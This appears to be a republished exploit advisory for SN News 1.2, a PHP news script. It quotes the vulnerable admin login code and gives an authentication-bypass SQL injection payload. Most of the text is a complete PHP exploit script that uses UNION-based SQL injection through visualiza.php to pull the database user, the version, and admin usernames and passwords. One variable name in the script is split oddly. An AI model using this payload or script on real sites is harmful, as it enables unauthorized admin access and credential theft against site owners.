SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability 影响版本 1.2 下载 地址: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news 作者不为任何危害负责 ############################################################################## ## 缺陷位于- /admin/logar.php [4-15]: 4.$login = $_POST["login"]; 5.$senha = $_POST["senha"]; 6.$sql = "select * from news_adm where login='$login' AND senha='$senha'"; 7.$query = mysql_query($sql); 8.$nr = mysql_num_rows($query); 9.if($nr>0){ 10.$_SESSION["admin"] = "on"; 11.echo "<script> 12.location.href='' 13.</script> 14."; 15.} ## 注释: ## As you can see there is no validation or any filter to variables $login and $senha. ## See line 6, so you can inject sql query by using $login and $senha variables. ## SQL Injection PoC: ## http:// www.2cto.com /sn_news/admin/login.htm ## Login: ' or '1'='1 ## Senha: ' or '1'='1 ## This injection will bypass the admin login screen. # 标题: SN News <= 1.2 SQL Injection <?php /* 示例: $ php mnews.php http:// www.2cto.com /scripts/mnews/ */ error_reporting(E_ERROR); set_time_limit(0); @ini_set("default_socket_timeout", 30); function hex($string){ $hex=''; // PHP 'Dim' =] for ($i=0; $i < strlen($string); $i++){ $hex .= dechex(ord($string[$i])); } return '0x'.$hex; } echo "\nSN News <= 1.2 SQL Injection exploit\n"; echo "Discovered and written by WhiteCollarGroup\n"; echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n"; if($argc!=2) { echo "Usage: \n"; echo "php $argv[0] <target url>\n"; echo "Example:\n"; echo "php $argv[0] http://www.website.com/snnews\n"; exit; } $target = $argv[1]; if(substr($target, (strlen($target)-1))!="/") { $target .= "/"; } $inject = $target . "visualiza.php?id=-0'%20"; $token = uniqid(); $token_hex = hex($token); echo "[*] Trying to get informations...\n"; $infos = file_get_contents($inject.urlencode("union all select 1,concat(".$token_hex.", user(), ".$token_hex.", version(), ".$token_hex."),3,4,5-- ")); $infos_r = array(); preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r); $user = $infos_r[1][0]; $version = $infos_r[2][0]; if($user) { echo "[*] MySQL version: $version\n"; echo "[*] MySQL user: $user\n"; } else { echo "[-] Error while getting informations.\n"; } echo "[*] Getting users...\n"; $i = 0; while(true) { $da dos _r = array(); $dados = file_get_contents($inject.urlencode("union all select 1,concat(".$token_hex.", login, ".$token_hex.", senha, ".$token_hex."),3,4,5 from news_adm limit $i,1-- ")); preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r); $login = $dados_r[1][0]; $senha = $dados_r[2][0]; if(($login) AND ($senha)) { echo "-+-\n"; echo "User: $login\n"; echo "Pass: $senha\n"; } else { break; } $i++; } echo "-+-+-\n"; if($i!=0) { echo "[!] Admin login: {$target}admin/\n"; } else { echo "[-] Exploit failed. Make sure that's server is using a valid version of SN News without Apache mod_security.\nWe're sorry."; } echo "\n";
查看更多关于SN News <= 1.2管理权限验证绕过及注射 - 网站安全的详细内容...